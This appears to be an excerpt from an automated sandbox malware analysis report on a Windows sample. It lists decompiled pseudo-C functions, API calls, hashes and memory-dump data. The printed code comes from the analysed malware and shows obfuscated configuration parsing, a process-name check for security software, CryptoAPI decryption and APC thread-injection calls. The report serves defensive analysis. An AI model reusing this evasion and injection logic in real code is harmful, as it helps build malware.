                • Source File: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Offset: 00716000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_716000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: a5ee145f302fdda1ff531744e25b6ea6107e5eaefac0b340e55c60c89c12b58d
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: 2B112B79A00208EFDB01DF98C985E99BBF5AF08751F158094F9489B362D375EA90DB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E022233F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                				void* _t21;
                				void* _t22;
                				signed int _t24;
                				intOrPtr* _t26;
                				void* _t27;
                
                				_t26 = __edi;
                				if(_a4 == 0) {
                					L2:
                					_t27 = E022258BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                					if(_t27 == 0) {
                						_t24 = _a12 >> 1;
                						if(_t24 == 0) {
                							_t27 = 2;
                							HeapFree( *0x222a2d8, 0, _a4);
                						} else {
                							_t21 = _a4;
                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                							 *_t26 = _t21;
                						}
                					}
                					L6:
                					return _t27;
                				}
                				_t22 = E02222839(_a4, _a8, _a12, __edi); // executed
                				_t27 = _t22;
                				if(_t27 == 0) {
                					goto L6;
                				}
                				goto L2;
                			}








                0x022233f1
                0x022233f9
                0x02223410
                0x0222342b
                0x0222342f
                0x02223434
                0x02223436
                0x02223448
                0x02223454
                0x02223438
                0x02223438
                0x0222343d
                0x02223442
                0x02223442
                0x02223436
                0x0222345a
                0x0222345e
                0x0222345e
                0x02223405
                0x0222340a
                0x0222340e
                0x00000000
                0x00000000
                0x00000000

                APIs
                  • Part of subcall function 02222839: SysFreeString.OLEAUT32(00000000), ref: 0222289C
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74D0F710,?,00000000,?,00000000,?,0222528E,?,004F0053,02BD9218,00000000,?), ref: 02223454
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID:
                • API String ID: 3806048269-0
                • Opcode ID: cace4db11b6c5b9e4e1b6b955fd40f0aef6f528f96b02637efd89b940b946ac6
                • Instruction ID: 22b344014f4b86e694551e1549f2e34ade3246fc238fce33f625e8f29115db27
                • Opcode Fuzzy Hash: cace4db11b6c5b9e4e1b6b955fd40f0aef6f528f96b02637efd89b940b946ac6
                • Instruction Fuzzy Hash: DA018B3280062ABBCB23CF84CC00FEA3B65EF14750F448065FE089A124D732D978DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E02225063(void* __ecx, void* __edx, void* _a4, void* _a8) {
                				void* _t13;
                				void* _t21;
                
                				_t11 =  &_a4;
                				_t21 = 0;
                				__imp__( &_a8);
                				_t13 = E02221508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                				if(_t13 == 0) {
                					_t21 = E022233DC(_a8 + _a8);
                					if(_t21 != 0) {
                						E022222EA(_a4, _t21, _t23);
                					}
                					E022261DA(_a4);
                				}
                				return _t21;
                			}





                0x0222506b
                0x02225072
                0x02225074
                0x02225083
                0x0222508a
                0x02225099
                0x0222509d
                0x022250a4
                0x022250a4
                0x022250ac
                0x022250b1
                0x022250b6

                APIs
                • lstrlen.KERNEL32(00000000,00000000,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 02225074
                  • Part of subcall function 02221508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02225088,00000001,02223ECE,00000000), ref: 02221540
                  • Part of subcall function 02221508: memcpy.NTDLL(02225088,02223ECE,00000010,?,?,?,02225088,00000001,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740), ref: 02221559
                  • Part of subcall function 02221508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02221582
                  • Part of subcall function 02221508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0222159A
                  • Part of subcall function 02221508: memcpy.NTDLL(00000000,7491C740,02BD9600,00000010), ref: 022215EC
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 17fff232a9e5e369dc1b54db237e0274493d84783d74de0ba4039d8717db5abf
                • Instruction ID: db6e76236d5a32016f166acee2c69e3017f77525b48e26e495fe181f53767f79
                • Opcode Fuzzy Hash: 17fff232a9e5e369dc1b54db237e0274493d84783d74de0ba4039d8717db5abf
                • Instruction Fuzzy Hash: 7BF0303611012DBACF116E95DC00DDA3B6EEF88360B008021FD098A114DA73D6699BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00501FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00501C63), ref: 00501FDE
                  • Part of subcall function 00501FCF: GetVersion.KERNEL32(?,00501C63), ref: 00501FED
                  • Part of subcall function 00501FCF: GetCurrentProcessId.KERNEL32(?,00501C63), ref: 00502009
                  • Part of subcall function 00501FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00501C63), ref: 00502022
                  • Part of subcall function 0050154D: RtlAllocateHeap.NTDLL(00000000,?,00501477), ref: 00501559
                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00501C8D
                • Sleep.KERNEL32(00000000,00000030), ref: 00501CD4
                • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00501CFC
                • GetSystemDefaultUILanguage.KERNEL32 ref: 00501D06
                • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00501D19
                • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00501D8E
                • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 00501DA4
                • GetLastError.KERNEL32 ref: 00501DB4
                • TerminateThread.KERNEL32(00000000,00000000), ref: 00501DBE
                • SetLastError.KERNEL32(00000000), ref: 00501DCA
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00501DD7
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00501DE9
                • GetLastError.KERNEL32 ref: 00501DF4
                • GetLastError.KERNEL32 ref: 00501E05
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                • String ID:
                • API String ID: 1666582358-0
                • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                • Instruction ID: 44a3aebddb2bbbfa53ecaca520c9d06d5550ba231b4703d8973d3a448cd2bfe3
                • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                • Instruction Fuzzy Hash: 0B51A176901915BBE721EFB59D489AFBF7DBB84751F104025F901E6190E730CE408BAA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E02221D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
                				int _v8;
                				void* _v12;
                				void* _v16;
                				signed int _t28;
                				signed int _t33;
                				signed int _t39;
                				char* _t45;
                				char* _t46;
                				char* _t47;
                				char* _t48;
                				char* _t49;
                				char* _t50;
                				void* _t51;
                				void* _t52;
                				void* _t53;
                				intOrPtr _t54;
                				void* _t56;
                				intOrPtr _t57;
                				intOrPtr _t58;
                				signed int _t61;
                				intOrPtr _t64;
                				signed int _t65;
                				signed int _t70;
                				void* _t72;
                				void* _t73;
                				signed int _t75;
                				signed int _t78;
                				signed int _t82;
                				signed int _t86;
                				signed int _t90;
                				signed int _t94;
                				signed int _t98;
                				void* _t101;
                				void* _t102;
                				void* _t116;
                				void* _t119;
                				intOrPtr _t122;
                
                				_t119 = __esi;
                				_t116 = __edi;
                				_t104 = __ecx;
                				_t101 = __ebx;
                				_t28 =  *0x222a344; // 0x43175ac3
                				if(E022210F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
                					 *0x222a374 = _v8;
                				}
                				_t33 =  *0x222a344; // 0x43175ac3
                				if(E022210F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
                					_v12 = 2;
                					L69:
                					return _v12;
                				}
                				_t39 =  *0x222a344; // 0x43175ac3
                				_push(_t116);
                				if(E022210F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
                					L67:
                					HeapFree( *0x222a2d8, 0, _v16);
                					goto L69;
                				} else {
                					_push(_t101);
                					_t102 = _v12;
                					if(_t102 == 0) {
                						_t45 = 0;
                					} else {
                						_t98 =  *0x222a344; // 0x43175ac3
                						_t45 = E022236C5(_t104, _t102, _t98 ^ 0x523046bc);
                					}
                					_push(_t119);
                					if(_t45 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                							 *0x222a2e0 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t46 = 0;
                					} else {
                						_t94 =  *0x222a344; // 0x43175ac3
                						_t46 = E022236C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
                					}
                					if(_t46 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                							 *0x222a2e4 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t47 = 0;
                					} else {
                						_t90 =  *0x222a344; // 0x43175ac3
                						_t47 = E022236C5(_t104, _t102, _t90 ^ 0x1b5903e6);
                					}
                					if(_t47 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                							 *0x222a2e8 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t48 = 0;
                					} else {
                						_t86 =  *0x222a344; // 0x43175ac3
                						_t48 = E022236C5(_t104, _t102, _t86 ^ 0x267c2349);
                					}
                					if(_t48 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                							 *0x222a004 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t49 = 0;
                					} else {
                						_t82 =  *0x222a344; // 0x43175ac3
                						_t49 = E022236C5(_t104, _t102, _t82 ^ 0x167db74c);
                					}
                					if(_t49 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                							 *0x222a02c = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t50 = 0;
                					} else {
                						_t78 =  *0x222a344; // 0x43175ac3
                						_t50 = E022236C5(_t104, _t102, _t78 ^ 0x02ddbcae);
                					}
                					if(_t50 == 0) {
                						L41:
                						 *0x222a2ec = 5;
                						goto L42;
                					} else {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                							goto L41;
                						} else {
                							L42:
                							if(_t102 == 0) {
                								_t51 = 0;
                							} else {
                								_t75 =  *0x222a344; // 0x43175ac3
                								_t51 = E022236C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
                							}
                							if(_t51 != 0) {
                								_push(_t51);
                								_t72 = 0x10;
                								_t73 = E02225B85(_t72);
                								if(_t73 != 0) {
                									_push(_t73);
                									E0222607C();
                								}
                							}
                							if(_t102 == 0) {
                								_t52 = 0;
                							} else {
                								_t70 =  *0x222a344; // 0x43175ac3
                								_t52 = E022236C5(_t104, _t102, _t70 ^ 0x93710135);
                							}
                							if(_t52 != 0 && E02225B85(0, _t52) != 0) {
                								_t122 =  *0x222a3cc; // 0x2bd9600
                								E02225364(_t122 + 4, _t68);
                							}
                							if(_t102 == 0) {
                								_t53 = 0;
                							} else {
                								_t65 =  *0x222a344; // 0x43175ac3
                								_t53 = E022236C5(_t104, _t102, _t65 ^ 0x175474b7);
                							}
                							if(_t53 == 0) {
                								L59:
                								_t54 =  *0x222a348; // 0x9ad5a8
                								_t22 = _t54 + 0x222b5f3; // 0x616d692f
                								 *0x222a370 = _t22;
                								goto L60;
                							} else {
                								_t64 = E02225B85(0, _t53);
                								 *0x222a370 = _t64;
                								if(_t64 != 0) {
                									L60:
                									if(_t102 == 0) {
                										_t56 = 0;
                									} else {
                										_t61 =  *0x222a344; // 0x43175ac3
                										_t56 = E022236C5(_t104, _t102, _t61 ^ 0xf8a29dde);
                									}
                									if(_t56 == 0) {
                										_t57 =  *0x222a348; // 0x9ad5a8
                										_t23 = _t57 + 0x222b899; // 0x6976612e
                										_t58 = _t23;
                									} else {
                										_t58 = E02225B85(0, _t56);
                									}
                									 *0x222a3e0 = _t58;
                									HeapFree( *0x222a2d8, 0, _t102);
                									_v12 = 0;
                									goto L67;
                								}
                								goto L59;
                							}
                						}
                					}
                				}
                			}








































                0x02221d8a
                0x02221d8a
                0x02221d8a
                0x02221d8a
                0x02221d8d
                0x02221daa
                0x02221db8
                0x02221db8
                0x02221dbd
                0x02221dd7
                0x02222045
                0x0222204c
                0x02222050
                0x02222050
                0x02221ddd
                0x02221de2
                0x02221dfa
                0x02222032
                0x0222203c
                0x00000000
                0x02221e00
                0x02221e00
                0x02221e01
                0x02221e06
                0x02221e1c
                0x02221e08
                0x02221e08
                0x02221e15
                0x02221e15
                0x02221e1e
                0x02221e27
                0x02221e29
                0x02221e33
                0x02221e38
                0x02221e38
                0x02221e33
                0x02221e3f
                0x02221e55
                0x02221e41
                0x02221e41
                0x02221e4e
                0x02221e4e
                0x02221e59
                0x02221e5b
                0x02221e65
                0x02221e6a
                0x02221e6a
                0x02221e65
                0x02221e71
                0x02221e87
                0x02221e73
                0x02221e73
                0x02221e80
                0x02221e80
                0x02221e8b
                0x02221e8d
                0x02221e97
                0x02221e9c
                0x02221e9c
                0x02221e97
                0x02221ea3
                0x02221eb9
                0x02221ea5
                0x02221ea5
                0x02221eb2
                0x02221eb2
                0x02221ebd
                0x02221ebf
                0x02221ec9
                0x02221ece
                0x02221ece
                0x02221ec9
                0x02221ed5
                0x02221eeb
                0x02221ed7
                0x02221ed7
                0x02221ee4
                0x02221ee4
                0x02221eef
                0x02221ef1
                0x02221efb
                0x02221f00
                0x02221f00
                0x02221efb
                0x02221f07
                0x02221f1d
                0x02221f09
                0x02221f09
                0x02221f16
                0x02221f16
                0x02221f21
                0x02221f34
                0x02221f34
                0x00000000
                0x02221f23
                0x02221f23
                0x02221f2d
                0x00000000
                0x02221f3e
                0x02221f3e
                0x02221f40
                0x02221f56
                0x02221f42
                0x02221f42
                0x02221f4f
                0x02221f4f
                0x02221f5a
                0x02221f5c
                0x02221f5f
                0x02221f60
                0x02221f67
                0x02221f69
                0x02221f6a
                0x02221f6a
                0x02221f67
                0x02221f71
                0x02221f87
                0x02221f73
                0x02221f73
                0x02221f80
                0x02221f80
                0x02221f8b
                0x02221f99
                0x02221fa3
                0x02221fa3
                0x02221fab
                0x02221fc1
                0x02221fad
                0x02221fad
                0x02221fba
                0x02221fba
                0x02221fc5
                0x02221fd8
                0x02221fd8
                0x02221fdd
                0x02221fe3
                0x00000000
                0x02221fc7
                0x02221fca
                0x02221fcf
                0x02221fd6
                0x02221fe8
                0x02221fea
                0x02222000
                0x02221fec
                0x02221fec
                0x02221ff9
                0x02221ff9
                0x02222004
                0x02222010
                0x02222015
                0x02222015
                0x02222006
                0x02222009
                0x02222009
                0x02222023
                0x02222028
                0x0222202e
                0x00000000
                0x02222031
                0x00000000
                0x02221fd6
                0x02221fc5
                0x02221f2d
                0x02221f21

                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221E2F
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221E61
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221E93
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221EC5
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221EF7
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221F29
                • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02222028
                • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 0222203C
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 9f323ac73dd9bd4336db69ce15323151a6a59e9052adefd177d9a579f3862204
                • Instruction ID: 08b4a944c1d03be32418ed7d404efde8a1cd655b15f10de0c5f88c5fbb4b5901
                • Opcode Fuzzy Hash: 9f323ac73dd9bd4336db69ce15323151a6a59e9052adefd177d9a579f3862204
                • Instruction Fuzzy Hash: 1781B270E30225BBC720DBF49E8CD6B76EE9B487047650D25A505D720DEB7BDA6C8B20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E022230D5() {
                				char _v264;
                				void* _v300;
                				int _t8;
                				intOrPtr _t9;
                				int _t15;
                				void* _t17;
                
                				_t15 = 0;
                				_t17 = CreateToolhelp32Snapshot(2, 0);
                				if(_t17 != 0) {
                					_t8 = Process32First(_t17,  &_v300);
                					while(_t8 != 0) {
                						_t9 =  *0x222a348; // 0x9ad5a8
                						_t2 = _t9 + 0x222be88; // 0x73617661
                						_push( &_v264);
                						if( *0x222a12c() != 0) {
                							_t15 = 1;
                						} else {
                							_t8 = Process32Next(_t17,  &_v300);
                							continue;
                						}
                						L7:
                						CloseHandle(_t17);
                						goto L8;
                					}
                					goto L7;
                				}
                				L8:
                				return _t15;
                			}









                0x022230e0
                0x022230ea
                0x022230ee
                0x022230f8
                0x02223129
                0x022230ff
                0x02223104
                0x02223111
                0x0222311a
                0x02223131
                0x0222311c
                0x02223124
                0x00000000
                0x02223124
                0x02223132
                0x02223133
                0x00000000
                0x02223133
                0x00000000
                0x0222312d
                0x02223139
                0x0222313e

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022230E5
                • Process32First.KERNEL32(00000000,?), ref: 022230F8
                • Process32Next.KERNEL32(00000000,?), ref: 02223124
                • CloseHandle.KERNEL32(00000000), ref: 02223133
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: 0c7d8a02c4149b1493dc83df0f80dade02a0e9481ec2cea02e1152c095a8ca09
                • Instruction ID: 33386ac5cf873cd79b0454190ca64ddf9e9259ac3adba23393b1526d8e9947a4
                • Opcode Fuzzy Hash: 0c7d8a02c4149b1493dc83df0f80dade02a0e9481ec2cea02e1152c095a8ca09
                • Instruction Fuzzy Hash: 3BF0BB325102747ADB30E6E69C49FEB776CEBC5310F0100A1EE45D3018EB66D65DCE61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401D68() {
                				void* _t1;
                				unsigned int _t3;
                				void* _t4;
                				long _t5;
                				void* _t6;
                				intOrPtr _t10;
                				void* _t14;
                
                				_t10 =  *0x404170;
                				_t1 = CreateEventA(0, 1, 0, 0);
                				 *0x40417c = _t1;
                				if(_t1 == 0) {
                					return GetLastError();
                				}
                				_t3 = GetVersion();
                				if(_t3 != 5) {
                					L4:
                					if(_t14 <= 0) {
                						_t4 = 0x32;
                						return _t4;
                					} else {
                						goto L5;
                					}
                				} else {
                					if(_t3 >> 8 > 0) {
                						L5:
                						 *0x40416c = _t3;
                						_t5 = GetCurrentProcessId();
                						 *0x404168 = _t5;
                						 *0x404170 = _t10;
                						_t6 = OpenProcess(0x10047a, 0, _t5);
                						 *0x404164 = _t6;
                						if(_t6 == 0) {
                							 *0x404164 =  *0x404164 | 0xffffffff;
                						}
                						return 0;
                					} else {
                						_t14 = _t3 - _t3;
                						goto L4;
                					}
                				}
                			}










                0x00401d69
                0x00401d77
                0x00401d7d
                0x00401d84
                0x00401ddb
                0x00401ddb
                0x00401d86
                0x00401d8e
                0x00401d9b
                0x00401d9b
                0x00401dd7
                0x00401dd9
                0x00000000
                0x00000000
                0x00000000
                0x00401d90
                0x00401d97
                0x00401d9d
                0x00401d9d
                0x00401da2
                0x00401db0
                0x00401db5
                0x00401dbb
                0x00401dc1
                0x00401dc8
                0x00401dca
                0x00401dca
                0x00401dd4
                0x00401d99
                0x00401d99
                0x00000000
                0x00401d99
                0x00401d97

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                • GetVersion.KERNEL32 ref: 00401D86
                • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID:
                • API String ID: 845504543-0
                • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
                • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .$GetProcAddress.$l
                • API String ID: 0-2784972518
                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                • Instruction ID: c82c370464328a4a26a1431275042aa0e07294963062ef4ecf674b9c31d5cdc2
                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                • Instruction Fuzzy Hash: 74318AB6900609DFDB10CF99C880BAEBBF9FF48324F24544AD841A7391D771EA45CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 49%
                			E022216DF(void* __ecx, intOrPtr* _a4) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				void _v76;
                				intOrPtr* _t226;
                				signed int _t229;
                				signed int _t231;
                				signed int _t233;
                				signed int _t235;
                				signed int _t237;
                				signed int _t239;
                				signed int _t241;
                				signed int _t243;
                				signed int _t245;
                				signed int _t247;
                				signed int _t249;
                				signed int _t251;
                				signed int _t253;
                				signed int _t255;
                				signed int _t257;
                				signed int _t259;
                				signed int _t338;
                				signed char* _t348;
                				signed int _t349;
                				signed int _t351;
                				signed int _t353;
                				signed int _t355;
                				signed int _t357;
                				signed int _t359;
                				signed int _t361;
                				signed int _t363;
                				signed int _t365;
                				signed int _t367;
                				signed int _t376;
                				signed int _t378;
                				signed int _t380;
                				signed int _t382;
                				signed int _t384;
                				intOrPtr* _t400;
                				signed int* _t401;
                				signed int _t402;
                				signed int _t404;
                				signed int _t406;
                				signed int _t408;
                				signed int _t410;
                				signed int _t412;
                				signed int _t414;
                				signed int _t416;
                				signed int _t418;
                				signed int _t420;
                				signed int _t422;
                				signed int _t424;
                				signed int _t432;
                				signed int _t434;
                				signed int _t436;
                				signed int _t438;
                				signed int _t440;
                				signed int _t508;
                				signed int _t599;
                				signed int _t607;
                				signed int _t613;
                				signed int _t679;
                				void* _t682;
                				signed int _t683;
                				signed int _t685;
                				signed int _t690;
                				signed int _t692;
                				signed int _t697;
                				signed int _t699;
                				signed int _t718;
                				signed int _t720;
                				signed int _t722;
                				signed int _t724;
                				signed int _t726;
                				signed int _t728;
                				signed int _t734;
                				signed int _t740;
                				signed int _t742;
                				signed int _t744;
                				signed int _t746;
                				signed int _t748;
                
                				_t226 = _a4;
                				_t348 = __ecx + 2;
                				_t401 =  &_v76;
                				_t682 = 0x10;
                				do {
                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                					_t401 =  &(_t401[1]);
                					_t348 =  &(_t348[4]);
                					_t682 = _t682 - 1;
                				} while (_t682 != 0);
                				_t6 = _t226 + 4; // 0x14eb3fc3
                				_t683 =  *_t6;
                				_t7 = _t226 + 8; // 0x8d08458b
                				_t402 =  *_t7;
                				_t8 = _t226 + 0xc; // 0x56c1184c
                				_t349 =  *_t8;
                				asm("rol eax, 0x7");
                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                				asm("rol ecx, 0xc");
                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                				asm("ror edx, 0xf");
                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                				asm("ror esi, 0xa");
                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                				_v8 = _t685;
                				_t690 = _v8;
